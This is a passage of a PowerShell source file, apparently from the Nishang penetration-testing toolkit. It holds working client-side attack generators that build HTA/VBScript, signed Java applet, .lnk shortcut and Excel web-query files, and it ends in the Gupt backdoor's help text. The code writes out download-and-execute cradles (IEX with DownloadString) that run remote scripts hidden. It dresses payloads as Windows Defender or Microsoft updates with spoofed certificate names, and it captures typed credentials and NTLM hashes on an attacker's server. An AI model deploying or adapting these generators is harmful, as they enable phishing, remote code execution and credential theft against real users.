<p xmlns="">In <b>TCP/IP Gateway Address</b>, type the IP address of the default gateway in <b>Gateway</b>. To manually configure a default route metric, clear the <b>Automatic metric </b>check box and type a metric in <b>Metric</b>.</p>
</content></li><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
<p xmlns="">Click <b>Add</b>.</p>
</content></li><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
<p xmlns="">Repeat steps 1 through 3 for each default gateway you want to add, and then click <b>OK</b>.</p>
</content></li></ol></ddue:steps>

<table class="alertTable" cellspacing="0" cellpadding="0" xmlns=""><tr><td class="imgCell"><img class="note" src="../local/Procedure.gif"></img></td><td class="procHeadingCell"><b>To configure a custom metric for this connection</b></td></tr></table><ddue:steps><ul xmlns=""><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
<p xmlns="">Clear the <b>Automatic metric</b> check box, and then type a metric value in <b>Interface metric</b>.</p>
</content></li></ul></ddue:steps>
</content></div><h1 class="heading">Additional references</h1><div id="sectionSection1" class="section"><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
<p xmlns="">For updated detailed IT pro information about TCP/IP versions 4 and 6, see <a href="http://go.microsoft.com/fwlink/?LinkID=117437" alt="" target="_blank"><linkText xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">http://go.microsoft.com/fwlink/?LinkID=117437</linkText></a> and <a href="http://go.microsoft.com/fwlink/?LinkID=71543" alt="" target="_blank"><linkText xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">http://go.microsoft.com/fwlink/?LinkID=71543</linkText></a>.</p>
</content></div></div><hr /><p /></div></body></html>
</BODY>
</HTML>
"@
 #Second help topic to make the file look authentic.
 #Pure decoy: no OBJECT/SCRIPT, nothing is interpolated.
 $CHMHTML2 = @"
<html DIR="LTR" xmlns:MSHelp="http://msdn.microsoft.com/mshelp" xmlns:ddue="http://ddue.schemas.microsoft.com/authoring/2003/5" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:tool="http://www.microsoft.com/tooltip"><head><META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=Windows-1252"></META><META NAME="save" CONTENT="history"></META><title>IPv4 Advanced WINS Tab</title><link rel="stylesheet" type="text/css" href="../local/Classic.css"></link><script src="../local/script.js"></script></head><body><div id="header"><h1>IPv4 Advanced WINS Tab</h1></div><div id="mainSection"><div id="mainBody"><p class="runningHeader"></p>
<p>You can use the settings on this tab for this network connection only if you are not using the <b>Obtain an IP address automatically</b> on the <b>General</b> tab.</p>

<p><b>WINS addresses, in order of use</b> lists the Windows Internet Name Service (WINS) servers that TCP/IP queries to resolve network basic input/output system (NetBIOS) names. WINS servers are queried in the order in which they are listed here.</p>

<p><b>Enable LMHOSTS lookup</b> specifies whether an Lmhosts file is used to resolve the NetBIOS names of remote computers to an IP address. </p>

<p>Click <b>Import LMHOSTS</b> to import a file into the Lmhosts file. The Lmhosts file is located in the %SystemRoot%\System32\Drivers\Etc folder on a Windows-based computer. There is also a sample Lmhosts file (Lmhosts.sam) in this folder. When you import LMHOSTS from a file, the original Lmhosts file is not appended to, but is overwritten by the new file.</p>

<p><b>NetBIOS setting</b> specifies whether this network connection obtains the setting to enable or disable NetBIOS over TCP/IP (NetBT) from a Dynamic Host Configuration Protocol (DHCP) server. </p>

<p>When an IP address is automatically obtained, the <b>Default</b> option is selected so that this computer uses the NetBT setting as optionally provided by the DHCP server when this computer obtains an IP address and configuration lease. If the Disable NetBIOS over TCP/IP (NetBT) DHCP option is provided by the DHCP server, the value of the option determines whether NetBT is enabled or disabled. If the Disable NetBIOS over TCP/IP (NetBT) DHCP option is not provided by the DHCP server, NetBT is enabled.</p>

<p>If you are manually configuring an IP address, selecting <b>Enable NetBIOS over TCP/IP</b> enables NetBT. This option is not available for dial-up connections.</p>
<h1 class="heading">Procedures</h1><div id="sectionSection0" class="section"><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
<table class="alertTable" cellspacing="0" cellpadding="0" xmlns=""><tr><td class="imgCell"><img class="note" src="../local/Procedure.gif"></img></td><td class="procHeadingCell"><b>To configure advanced WINS properties</b></td></tr></table><ddue:steps><ol class="ordered" xmlns=""><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
<p xmlns="">In <b>WINS addresses, in order of use</b>, click <b>Add</b>, type the address of the WINS server, and then click <b>Add</b>.</p>
</content></li><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
<p xmlns="">Repeat step 1 for each WINS server IP address you want to add, and then click <b>OK</b>.</p>
</content></li></ol></ddue:steps>

<table class="alertTable" cellspacing="0" cellpadding="0" xmlns=""><tr><td class="imgCell"><img class="note" src="../local/Procedure.gif"></img></td><td class="procHeadingCell"><b>To enable the use of the Lmhosts file to resolve remote NetBIOS names</b></td></tr></table><ddue:steps><ul xmlns=""><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
<p xmlns="">Select the <b>Enable LMHOSTS lookup</b> check box. This option is enabled by default.</p>
</content></li></ul></ddue:steps>

<table class="alertTable" cellspacing="0" cellpadding="0" xmlns=""><tr><td class="imgCell"><img class="note" src="../local/Procedure.gif"></img></td><td class="procHeadingCell"><b>To specify the location of the file that you want to import into the Lmhosts file</b></td></tr></table><ddue:steps><ul xmlns=""><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
<p xmlns="">Click <b>Import LMHOSTS</b>, and then select the file in the <b>Open</b> dialog box.</p>
</content></li></ul></ddue:steps>

<table class="alertTable" cellspacing="0" cellpadding="0" xmlns=""><tr><td class="imgCell"><img class="note" src="../local/Procedure.gif"></img></td><td class="procHeadingCell"><b>To enable or disable NetBIOS over TCP/IP</b></td></tr></table><ddue:steps><ul xmlns=""><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
<p xmlns="">To enable the use of NetBIOS over TCP/IP, click <b>Enable NetBIOS over TCP/IP</b>.</p>
</content></li><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
<p xmlns="">To disable the use of NetBIOS over TCP/IP, click <b>Disable NetBIOS over TCP/IP</b>.</p>
</content></li><li><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
<p xmlns="">To have the DHCP server determine whether NetBIOS over TCP/IP is enabled or disabled, click <b>Default</b>.</p>
</content></li></ul></ddue:steps>
</content></div><h1 class="heading">Additional references</h1><div id="sectionSection1" class="section"><content xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">
<p xmlns="">For updated detailed IT pro information about TCP/IP versions 4 and 6, see <a href="http://go.microsoft.com/fwlink/?LinkID=117437" alt="" target="_blank"><linkText xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">http://go.microsoft.com/fwlink/?LinkID=117437</linkText></a> and <a href="http://go.microsoft.com/fwlink/?LinkID=71543" alt="" target="_blank"><linkText xmlns="http://ddue.schemas.microsoft.com/authoring/2003/5">http://go.microsoft.com/fwlink/?LinkID=71543</linkText></a>.</p>
</content></div></div><hr /><p /></div></body></html>

"@

 #Write all files to disk for compilation
 #The fixed file names must match those referenced from $CHMProject and $CHMTableOfContents above.
 #-Encoding default is presumably chosen so hhc.exe reads them in the code page the topics declare (Windows-1252) — confirm.
 Out-File -InputObject $CHMTableOfContents -FilePath "$OutputPath\doc.hhc" -Encoding default
 Out-File -InputObject $CHMHTML1 -FilePath "$OutputPath\doc.htm" -Encoding default
 Out-File -InputObject $CHMHTML2 -FilePath "$OutputPath\doc1.htm" -Encoding default
 Out-File -InputObject $CHMProject -FilePath "$OutputPath\doc.hhp" -Encoding default

 #Compile the CHM, only this needs to be sent to a target.
 #NOTE(review): nothing checks that hhc.exe exists under $HHCPath or that compilation succeeded; the cleanup below
 #runs regardless, so a failed build leaves no intermediate files to inspect.
 $HHC = "$HHCPath" + "\hhc.exe"
 & "$HHC" "$OutputPath\doc.hhp"

 #Cleanup
 #Removes the four intermediate files; the compiled .chm produced by hhc.exe is left in $OutputPath
 #(presumably named after the project file, doc.chm — confirm).
 Remove-Item "$OutputPath\doc.hhc"
 Remove-Item "$OutputPath\doc.htm"
 Remove-Item "$OutputPath\doc1.htm"
 Remove-Item "$OutputPath\doc.hhp"

}
5127
5128#######################################Out-HTA#############################################
5129
function Out-HTA
{
<#
.SYNOPSIS
Nishang script which could be used for generating HTML Application and accompanying VBscript. These could be deployed on
a web server and powershell scripts and commands could be executed on the target machine.

.DESCRIPTION
The script generates two files. A HTA file and a VBScript. The HTA and VBScript should be deployed in same directory of a web server.
When a target browses to the HTA file the VBScript is executed. This VBScript is used to execute powershell scripts and commands.

The HTA references the VBScript by the relative name given in VBFilename (<script src>). Its body onload handler calls
start(), which calls the VBScript's Initialize(); that runs the payload command line through WScript.Shell.Run.
The HTA also embeds a Windows Defender page from windows.microsoft.com in an <object> purely as a decoy.

For defenders: the behaviour on a target is the HTA host process launching powershell.exe with -ExecutionPolicy Bypass
-noprofile (the default payload) or whatever command line was supplied; that parent/child relationship and the
WindDef_WebInstall.hta / launchps.vbs default names are the indicators to look for.

.PARAMETER Payload
Payload which you want execute on the target. This is the complete command line handed to WScript.Shell.Run, so it
must include powershell.exe itself (see the examples).

.PARAMETER PayloadURL
URL of the powershell script which would be executed on the target. Only used when Payload is not given.

.PARAMETER Arguments
Arguments to the powershell script to be executed on the target. Only used when Payload is not given.

.PARAMETER HTAFilePath
Path to the HTA file to be generated. Default is with the name WindDef_WebInstall.hta in the current directory.

.PARAMETER VBFilename
Name of the VBScript file as referenced from inside the HTA (the <script src> attribute). It must match the file name
part of VBFilepath, extension included. Default is launchps.vbs.

.PARAMETER VBFilepath
Path to the VBScript file to be generated. Default is with the name launchps.vbs in the current directory.

.EXAMPLE
PS > Out-HTA -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-ChildItem"

Above command would execute Get-ChildItem on the target machine when the HTA is opened.

.EXAMPLE
PS > Out-HTA -PayloadURL http://192.168.254.1/Get-Information.ps1

Use above command to generate HTA and VBS files which download and execute the given powershell script in memory on target.

.EXAMPLE
PS > Out-HTA -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM

Use above command to pass an argument to the powershell script/module.

.LINK
http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html
https://github.com/samratashok/nishang
#>


 [CmdletBinding()] Param(

 [Parameter(Position = 0, Mandatory = $False)]
 [String]
 $Payload,

 [Parameter(Position = 1, Mandatory = $False)]
 [String]
 $PayloadURL,


 [Parameter(Position = 2, Mandatory = $False)]
 [String]
 $Arguments,

 [Parameter(Position = 3, Mandatory = $False)]
 [String]
 $VBFilename="launchps.vbs",

 [Parameter(Position = 4, Mandatory = $False)]
 [String]
 $HTAFilePath="$pwd\WindDef_WebInstall.hta",


 [Parameter(Position = 5, Mandatory = $False)]
 [String]
 $VBFilepath="$pwd\launchps.vbs"
 )

 #Default payload: a powershell.exe download cradle for $PayloadURL with $Arguments appended.
 #Neither $PayloadURL nor $Arguments is validated.
 if(!$Payload)
 {
 $Payload = "powershell.exe -ExecutionPolicy Bypass -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments"
 }

 #HTA markup. <script src="$VBFilename"> pulls in the VBScript written below (so both files must be served from the
 #same location), <hta:application> marks the page as an HTML Application, and body onload -> start() -> Initialize()
 #hands control to the VBScript. The <object> pointing at windows.microsoft.com is only a decoy.
 #Only $VBFilename is interpolated here.
 $HTA = @"
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
 <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
 <title>Windows Defender Web Install</title>
 <script src="$VBFilename" type="text/vbscript" >
 </script>
 <hta:application
 id="oHTA"
 applicationname="Windows Defender Web Install"
 application="yes"
 >
 </hta:application>
 </head>

 <SCRIPT TYPE="text/javascript">
 function start(){

 Initialize();

 }
 //-->
 </SCRIPT>
 <div>
 <object type="text/html" data="http://windows.microsoft.com/en-IN/windows7/products/features/windows-defender" width="100%" height="100%">
 </object></div>


 <body onload="start()">
 </body>
 </html>
"@

 #VBScript companion: Initialize() runs $Payload via WScript.Shell.Run; the trailing 0 and true are Run's window-style
 #and wait arguments. $Payload is interpolated into a double-quoted VBScript literal without any escaping.
 $vbsscript = @"
 Sub Initialize()
 Set oShell = CreateObject( "WScript.Shell" )
 ps = "$Payload"
 oShell.run(ps),0,true
 End Sub
"@

 #NOTE(review): no -Encoding is passed here, unlike the Out-File calls in Out-CHM and Out-Java, so both files are
 #written in Out-File's default encoding for the running PowerShell.
 Out-File -InputObject $HTA -FilePath $HTAFilepath
 Out-File -InputObject $vbsscript -FilePath $VBFilepath
 Write-Output "HTA and VBS written to $HTAFilepath and $VBFilepath respectively."
}
5260
5261
5262#######################################Out-Java#############################################
5263
function Out-Java
{

<#
.SYNOPSIS
Nishang script which could be used for generating JAR to be used for applets.

.DESCRIPTION
The script generates a Signed JAR and one line HTML code. These could be deployed on a web server. When a target opens
up the URL hosting these, the predefined PowerShell commands and scripts could be executed on the target.

If you want to use valid/trusted certificate for signing use the -NoSelfSign option.

The JAR generated checks for the OS architecture and calls the 32-bit version of PowerShell for script execution.
So you need to pass only the 32 bit shellcode to it. In case you would like to use 64 bit PowerShell, remove the "if"
condition marked in the source of Java code being generated.

The script needs JDK to be installed on the attacker's machine. The parameters passed to keytool and jarsigner
could be changed in the source for further customization. Those are not asked as function parameters to keep the
number of parameters less for easy usage.

Pipeline: JavaPS.java is written to OutputPath and compiled with javac, packed into JavaPS.jar with a manifest that
requests all-permissions, then (unless -NoSelfSign) signed with a throwaway self-signed key into SignedJavaPS.jar
alongside applet.html. Intermediate files are removed at the end.

For defenders: the self-signed certificate carries a Microsoft-looking subject (see $DName) but chains to no trusted CA,
and the manifest's Application-Name is likewise spoofed; a JAR signed by such a certificate, or a Java process spawning
powershell.exe with -WindowStyle Hidden -nologo -noprofile, are the indicators this generator leaves.

.PARAMETER Payload
Payload which you want execute on the target.

.PARAMETER PayloadURL
URL of the powershell script which would be executed on the target. Only used when Payload is not given.

.PARAMETER Arguments
Arguments to the powershell script to be executed on the target. Only used when Payload is not given.

.PARAMETER JDKPath
Path to the JDK used to compile the .java code and to run jar, keytool and jarsigner (expects a bin\ subdirectory). Mandatory.

.PARAMETER OutputPath
Path to the directory where the files would be saved. Default is the current directory.

.PARAMETER NoSelfSign
Use this switch if you don't want to create a self signed certificate for signing the JAR.

.EXAMPLE
PS > Out-Java -Payload "Get-Process" -JDKPath "C:\Program Files\Java\jdk1.7.0_25"

Above command would execute Get-Process on the target machine when the JAR or Class file is executed.

.EXAMPLE
PS > Out-Java -PayloadURL http://192.168.254.1/Get-Information.ps1 -JDKPath "C:\Program Files\Java\jdk1.7.0_25"

Use above command to generate JAR which download and execute the given powershell script in memory on target.

.EXAMPLE
PS > Out-Java -Payload "-e <EncodedScript>" -JDKPath "C:\Program Files\Java\jdk1.7.0_25"

Use above command to generate JAR which executes the encoded script.
Use Invoke-Encode from Nishang to encode the script.

.EXAMPLE
PS > Out-Java -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -JDKPath "C:\Program Files\Java\jdk1.7.0_25"

Use above command to pass an argument to the powershell script/module.

.EXAMPLE
PS > Out-Java -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -JDKPath "C:\Program Files\Java\jdk1.7.0_25" -NoSelfSign

Due to the use of -NoSelfSign in above command, no self signed certificate would be used to sign the JAR.

.LINK
http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html
https://github.com/samratashok/nishang
#>



 [CmdletBinding()] Param(

 [Parameter(Position = 0, Mandatory = $False)]
 [String]
 $Payload,

 [Parameter(Position = 1, Mandatory = $False)]
 [String]
 $PayloadURL,


 [Parameter(Position = 2, Mandatory = $False)]
 [String]
 $Arguments,

 [Parameter(Position = 3, Mandatory = $True)]
 [String]
 $JDKPath,

 [Parameter(Position = 4, Mandatory = $False)]
 [String]
 $OutputPath="$pwd",

 [switch]
 $NoSelfSign


 )


 #Default payload: a download cradle for $PayloadURL with $Arguments appended. Neither value is validated.
 if(!$Payload)
 {
 $Payload = "IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments"
 }

#Java code taken from the Social Engineering Toolkit (SET) by David Kennedy
 #Everything between @" and "@ is the Java source; $Payload is interpolated by PowerShell before it is written out.
 #init() reads PROCESSOR_ARCHITECTURE / PROCESSOR_ARCHITEW6432 and, on a 64-bit host, switches to the SysWOW64
 #(32-bit) powershell.exe before running it hidden through Runtime.exec. The "Process s;" at the end is unused.
 $JavaClass = @"
import java.applet.*;
import java.awt.*;
import java.io.*;
public class JavaPS extends Applet {
public void init() {
Process f;
//http://stackoverflow.com/questions/4748673/how-can-i-check-the-bitness-of-my-os-using-java-j2se-not-os-arch/5940770#5940770
String arch = System.getenv("PROCESSOR_ARCHITECTURE");
String wow64Arch = System.getenv("PROCESSOR_ARCHITEW6432");
String realArch = arch.endsWith("64") || wow64Arch != null && wow64Arch.endsWith("64") ? "64" : "32";
String cmd = "powershell.exe -WindowStyle Hidden -nologo -noprofile $Payload";
//Remove the below if condition to use 64 bit powershell on 64 bit machines.
if (realArch == "64")
{
 cmd = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -WindowStyle Hidden -nologo -noprofile $Payload";
}
try {
f = Runtime.getRuntime().exec(cmd);
}
catch(IOException e) {
e.printStackTrace();
}
Process s;
}
}
"@


 #Compile the Java file
 #javac leaves JavaPS.class next to $JavaFile. NOTE(review): there is no check that javac.exe exists under $JDKPath
 #or that compilation succeeded before the packaging steps below run.
 $JavaFile = "$OutputPath\JavaPS.java"
 Out-File -InputObject $JavaClass -Encoding ascii -FilePath $JavaFile
 $JavacPath = "$JDKPath" + "\bin\javac.exe"
 & "$JavacPath" "$JavaFile"

 #Create a manifest for JAR, taken from SET
 #Requests all-permissions for any Codebase and presents a Microsoft-sounding Application-Name.
 $Manifest = @"
Permissions: all-permissions
Codebase: *
Application-Name: Microsoft Internet Explorer Update (SECURE)
"@
 $ManifestFile = "$OutputPath\manifest.txt"
 Out-File -InputObject $Manifest -Encoding ascii -FilePath $ManifestFile

 #Create the JAR
 #$Jarpath / $JarPath differ only in case; PowerShell variable names are case-insensitive so this is the same variable.
 #NOTE(review): "JavaPS.class" is passed as a bare name and so resolves against the current directory rather than
 #$OutputPath; the two coincide only with the default OutputPath.
 $Jarpath = "$JDKPath" + "\bin\jar.exe"
 & "$JarPath" "-cvfm" "$OutputPath\JavaPS.jar" "$ManifestFile" "JavaPS.class"

 #Parameters passed to keytool and jarsigner. You may change these to your choice.
 #Fixed, non-secret keystore passwords for a throwaway keystore that is deleted below. $DName gives the self-signed
 #certificate a Microsoft-looking subject; because the key is generated locally with keytool -genkeypair, the
 #signature chains to no trusted CA, which is what distinguishes it from a genuine Microsoft signature.
 $KeystoreAlias = "SignApplet"
 $KeyStore = "PSKeystore"
 $StorePass = "PSKeystorePass"
 $KeyPass = "PSKeyPass"
 $DName = "cn=Windows Update, ou=Microsoft Inc, o=Microsoft Inc, c=US"

 if ($NoSelfSign -eq $False)
 {
 #Generate a keypair for self-signing
 #http://rvnsec.wordpress.com/2014/09/01/ps1encode-powershell-for-days/
 #The keystore is written under the bare name $KeyStore, i.e. relative to the current directory.
 $KeytoolPath = "$JDKPath" + "\bin\keytool.exe"
 & "$KeytoolPath" "-genkeypair" "-alias" "$KeystoreAlias" "-keystore" "$KeyStore" "-keypass" "$KeyPass" "-storepass" "$StorePass" "-dname" "$DName"

 #Self sign the JAR
 #Produces $OutputPath\SignedJavaPS.jar from the unsigned JavaPS.jar using the $KeystoreAlias key ("SignApplet" is
 #repeated literally here rather than via the variable).
 $JarSignerPath = "$JDKPath" + "\bin\jarsigner.exe"
 & "$JarSignerPath" "-keystore" "$KeyStore" "-storepass" "$StorePass" "-keypass" "$KeyPass" "-signedjar" "$OutputPath\SignedJavaPS.jar" "$OutputPath\JavaPS.jar" "SignApplet"

 #Output simple html. This could be used with any cloned web page.
 #Host this HTML and SignedJarPS.jar on a web server.
 #Single-quoted here-string: nothing is interpolated. The <applet> tag references SignedJavaPS.jar by relative name,
 #so the HTML and the JAR must be served from the same directory; the <object> is a decoy page.
 $HTMLCode = @'
 <div>
 <object type="text/html" data="http://windows.microsoft.com/en-IN/internet-explorer/install-java" width="100%" height="100%">
 </object></div>
 <applet code="JavaPS" width="1" height="1" archive="SignedJavaPS.jar" > </applet>'
'@
 $HTMLFile = "$OutputPath\applet.html"
 Out-File -InputObject $HTMLCode -Encoding ascii -FilePath $HTMLFile

 #Cleanup
 #Removes the keystore plus JavaPS.java, JavaPS.class and the unsigned JavaPS.jar (the JavaPS* glob does not match
 #SignedJavaPS.jar), leaving SignedJavaPS.jar and applet.html in $OutputPath.
 #NOTE(review): the keystore is removed from $OutputPath although keytool above created it relative to the current
 #directory; this only lines up when OutputPath is left at its default.
 Remove-Item "$OutputPath\PSKeyStore"
 Remove-Item "$OutputPath\JavaPS*"
 }
 elseif ($NoSelfSign -eq $True)
 {
 #Reached only when the switch was given (-eq $True on a [switch] is equivalent to a plain else here).
 #Leaves the unsigned JavaPS.jar in place for the caller to sign with their own certificate.
 Write-Warning "You chose not to self sign. Use your valid certificate to sign the JavaPS.jar manually."
 #Cleanup
 Remove-Item "$OutputPath\JavaPS.java"
 Remove-Item "$OutputPath\JavaPS.class"
 }
 #Cleanup to remove temporary files
 Remove-Item "$OutputPath\manifest.txt"
}
5463
5464
5465#######################################Out-Shortcut#############################################
5466
5467function Out-Shortcut
5468{
5469<#
5470.SYNOPSIS
5471Nishang script which creates a shortcut capable of launching PowerShell commands and scripts.
5472
5473.DESCRIPTION
5474The script generates a shortcut (.lnk). When a target opens the shortcut, the predefined powershell scripts and/or commands get executed.
5475A hotkey for the shortcut could also be generated. Also, the icon of the shortcut could be set too.
5476
5477.PARAMETER Payload
5478Payload which you want execute on the target.
5479
5480.PARAMETER PayloadURL
5481URL of the powershell script which would be executed on the target.
5482
5483.PARAMETER Arguments
5484Arguments to the powershell script to be executed on the target.
5485
5486.PARAMETER OutputPath
5487Path to the .lnk file to be generated. Default is with the name Shortcut to File Server.lnk in the current directory.
5488
5489.PARAMETER Hotkey
5490The Hotkey to be assigned to the shortcut. Default is F5.
5491
5492.PARAMETER Icon
5493The Icon to be assigned to the generated shortcut. Default is that of explorer.exe
5494
5495.EXAMPLE
5496PS > Out-Shortcut -Payload "-WindowStyle hidden -ExecutionPolicy Bypass -noprofile -noexit -c Get-ChildItem"
5497
5498Above command would execute Get-ChildItem on the target machine when the shortcut is opened. Note that powershell.exe is
5499not a part of the payload as the shortcut already points to it.
5500
5501.EXAMPLE
5502PS > Out-Shortcut -PayloadURL http://192.168.254.1/Get-Wlan-Keys.ps1
5503
5504Use above command to generate a Shortcut which download and execute the given powershell script in memory on target.
5505
5506.EXAMPLE
5507PS > Out-Shortcut -Payload "-EncodedCommand <>"
5508
5509Use above command to generate a Shortcut which executes the given encoded command/script.
5510Use Invoke-Encode from Nishang to encode the command or script.
5511
5512
5513.EXAMPLE
5514PS > Out-Shortcut -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM
5515
5516Use above command to pass an argument to the powershell script/module.
5517
5518.EXAMPLE
5519PS > Out-Shortcut -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -HotKey 'F3'
5520
5521Use above command to assign F3 as hotkey to the shortcut
5522
5523.EXAMPLE
5524PS > Out-Shortcut -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -HotKey 'F3' -Icon 'notepad.exe'
5525
5526Use above command to assign notepad icon to the generated shortcut.
5527
5528.LINK
5529http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html
5530https://github.com/samratashok/nishang
5531http://blog.trendmicro.com/trendlabs-security-intelligence/black-magic-windows-powershell-used-again-in-new-attack/
5532#>
5533 [CmdletBinding()] Param(
5534 [Parameter(Position = 0, Mandatory = $False)]
5535 [String]
5536 $Payload,
5537
5538 [Parameter(Position = 1, Mandatory = $False)]
5539 [String]
5540 $PayloadURL,
5541
5542
5543 [Parameter(Position = 2, Mandatory = $False)]
5544 [String]
5545 $Arguments,
5546
5547 [Parameter(Position = 3, Mandatory = $False)]
5548 [String]
5549 $OutputPath = "$pwd\Shortcut to File Server.lnk",
5550
5551 [Parameter(Position = 4, Mandatory = $False)]
5552 [String]
5553 $HotKey = 'F5',
5554
5555
5556 [Parameter(Position = 5, Mandatory = $False)]
5557 [String]
5558 $Icon='explorer.exe'
5559
5560
5561
5562
5563 )
 # Without an explicit -Payload, the shortcut's argument string is assembled from
 # -PayloadURL and -Arguments. Neither value is validated here: an empty -PayloadURL
 # still yields a .lnk whose command line only fails when the shortcut is opened.
5564 if(!$Payload)
5565 {
5566 $Payload = " -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments"
5567 }
 # The .lnk is produced through the WScript.Shell COM object. TargetPath is hardcoded
 # to the Windows PowerShell host under the v1.0 folder, and the whole command line
 # is stored in the shortcut's Arguments field, so it is recoverable from the file
 # itself with any .lnk parser.
5568 $WshShell = New-Object -comObject WScript.Shell
5569 $Shortcut = $WshShell.CreateShortcut($OutputPath)
5570 $Shortcut.TargetPath = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
5571 $Shortcut.Description = "Shortcut to Windows Update Commandline"
 # WshShortcut.WindowStyle: 7 = start minimized (1 = normal, 3 = maximized).
5572 $Shortcut.WindowStyle = 7
 # -HotKey and -Icon are passed through unvalidated; WScript.Shell expects its own
 # "[modifier+]key" syntax for Hotkey and a "path,index" pair for IconLocation.
5573 $Shortcut.Hotkey = $HotKey
5574 $Shortcut.IconLocation = "$Icon,0"
5575 $Shortcut.Arguments = $Payload
 # Save() is not wrapped in try/catch; a failure (e.g. an unwritable -OutputPath)
 # surfaces as a COM error and the success message below may still be printed.
5576 $Shortcut.Save()
5577 Write-Output "The Shortcut file has been written as $OutputPath"
5578
5579}
5580
5581
5582######################################Out-WebQuery#############################################
5583function Out-WebQuery
5584{
5585<#
5586.SYNOPSIS
5587Nishang script which creates a Web Query (.iqy) file which can be used for phishing attacks.
5588
5589.DESCRIPTION
5590The script generates a Web Query (.iqy). When a target opens the file, it is opened inside an Excel Sheet and the
5591user is presented with a warning for enabling data connection. If the user allows it, he is presented with a prompt
5592which asks for credentials. As soon as the user enters the credentials, it is sent to the remote server specified
5593while generating the file.
5594
5595The attacker must run a web server which is able to log the requests made to it by the targets. While any regular web
5596server can be used, Start-CaptureServer.ps1 in the Utility directory of Nishang could be used as well. Start-CaptureServer
5597supports Basic auth for capturing credentials in plain and NTLM authentication for capturing hashes.
5598
5599.PARAMETER URL
5600URL to which the connection from the target is made. A web server which logs requests must run at this URL.
5601
5605.PARAMETER OutputPath
5606Path to the .iqy file to be generated. Default is with the name QueryData.iqy in the current directory.
5607
5608.EXAMPLE
5609PS > Out-WebQuery -URL http://192.168.1.2/
5610
5611Use above command to generate a Web Query file. When a user opens it and enables data connection,
5612a credentials prompt will be shown to him. The credentials entered could be captured on the listener machine
5613using Start-CaptureServer script from Nishang.
5614
5615To capture credentials in plain, run below command on the attacker's machine:
5616Start-CaptureServer -AuthType Basic -IPAddress 192.168.230.1 -LogFilePath C:\test\log.txt
5617
5618To capture hashes
5619Start-CaptureServer -AuthType NTLM2 -IPAddress 192.168.230.1 -LogFilePath C:\test\log.txt
5620
5621PS > Out-WebQuery -URL \\192.168.1.2\C$
5622
5623Use above command to generate a Web Query file. When a user opens it, his SMB hash would be captured
5624on the attacker's machine where Start-CaptureServer is running.
5625
5626
5627.LINK
5628http://www.labofapenetrationtester.com/2015/08/abusing-web-query-iqy-files.html
5629https://github.com/samratashok/nishang
5630https://twitter.com/subTee/status/631509345918783489
5631https://support.microsoft.com/en-us/kb/157482
5632#>
5633 [CmdletBinding()] Param(
5634 [Parameter(Position = 0, Mandatory = $True)]
5635 [String]
5636 $URL,
5637
5638 [Parameter(Position = 1, Mandatory = $False)]
5639 [String]
5640 $OutputPath = "$pwd\QueryData.iqy"
5641
5642 )
 # The three-line IQY body (type, version, URL) is the file's runtime content; $URL is
 # embedded verbatim with no validation of scheme or shape.
5643 $iqycontent = @"
5644WEB
56451
5646$URL
5647"@
5648
 # Written as ASCII so Excel reads a plain-text query file; any non-ASCII character in
 # $URL is replaced rather than preserved. Out-File errors are non-terminating, so the
 # success message below is printed regardless.
5649 Out-File -FilePath $OutputPath -InputObject $iqycontent -Encoding ascii
5650 Write-Output "The Web Query file has been written as $OutputPath"
5651
5652}
5653
5654##################################End of Client Side Attack functions###############################
5655
5656##################################### Gupt Backdoor #################################################
5657function Gupt-Backdoor
5658{
5659<#
5660.SYNOPSIS
5661Gupt is a backdoor in Nishang which could execute commands and scripts from specially crafted Wireless Network Names.
5662
5663.DESCRIPTION
5664Gupt looks for a specially crafted Wireless Network Name/SSID from list of all available networks. It matches first four characters of
5665each SSID with the parameter MagicString. On a match, if the 5th character is a 'c', rest of the SSID name is considered to be a command and
5666executed. If the 5th character is a 'u', rest of the SSID is considered the id part of Google URL Shortener and a script is downloaded and
5667executed in memory from the URL. See examples for usage.
5668
5669Gupt does not connect to any Wireless network and this makes it more stealthy and helps in bypassing network traffic monitoring.
5670
5671.PARAMETER MagicString
5672The string which Gupt would compare with the available SSIDs.
5673
5674.PARAMETER Arguments
5675Arguments to pass to a downloaded script.
5676
5677.EXAMPLE
